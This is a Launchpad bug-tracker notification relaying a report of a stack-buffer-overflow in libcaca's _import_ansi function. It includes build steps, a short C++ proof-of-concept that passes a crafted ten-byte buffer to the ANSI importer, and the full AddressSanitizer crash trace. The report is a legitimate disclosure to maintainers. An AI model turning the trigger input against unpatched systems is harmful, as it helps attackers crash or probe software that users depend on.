[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

[Bug Watch Updater]

** Changed in: libcaca
       Status: Unknown => New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca:
  New
Status in libcaca package in Ubuntu:
  Triaged

Bug description:
  Hello ubuntu security team

  issues: https://github.com/cacalabs/libcaca/issues/55

  System info：
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps：
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"ansi");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){

          size_t  len = 0;
          unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
          len = sizeof(buffer)/sizeof(unsigned char);
          printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
          crash((const uint8_t*)buffer,len);

          return 0;

  }
  4.compile poc_ansi.cc

  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:

  =================================================================
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
      #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
    0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
    0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
    0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
    0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
    Shadow gap:              cc
  ==3763372==ABORTING
  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/libcaca/+bug/1925467/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp